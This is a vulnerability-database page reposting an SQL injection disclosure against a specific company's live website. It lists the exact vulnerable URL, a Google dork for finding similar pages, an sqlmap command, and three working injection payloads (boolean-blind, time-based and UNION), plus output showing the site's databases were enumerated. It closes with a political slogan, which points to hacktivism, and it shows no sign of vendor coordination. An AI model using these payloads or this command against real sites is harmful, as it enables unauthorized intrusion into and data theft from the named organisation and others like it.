HRVAC Consulting Engineering Israel SQL Injection Vulnerability

2021.12.26
tr Emyounoone (TR) tr
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Title: HRVAC Consulting Engineering Israel SQL Injection Vulnerability # Author: Emyounoone # Google Dork: page.php?ID=112 # Date: 11/08/2021 # Vendor Homepage: https://www.hrvac.co.il # Tested on: Kali Linux # Vulnerable Path: https://www.hrvac.co.il/page.php?ID=112 # python3 sqlmap.py https://www.hrvac.co.il/page.php?ID=112 --dbs --random-agent --- Parameter: ID (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: ID=112' AND 7844=7844 AND 'cGIy'='cGIy Type: time-based blind Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP) Payload: ID=112' OR (SELECT 1875 FROM (SELECT(SLEEP(5)))qItF) AND 'aNeS'='aNeS Type: UNION query Title: Generic UNION query (NULL) - 7 columns Payload: ID=112' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716a717871,0x645043656450477a766165584669646c7562665768736f56634f6f744d45476b766f4d4968727349,0x71717a7171),NULL,NULL,NULL-- - --- #Evidence: available databases [2]: [*] hrvac_site [*] information_schema # KUDÜS İSLAMINDIR !


Vote for this issue:
33%
67%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top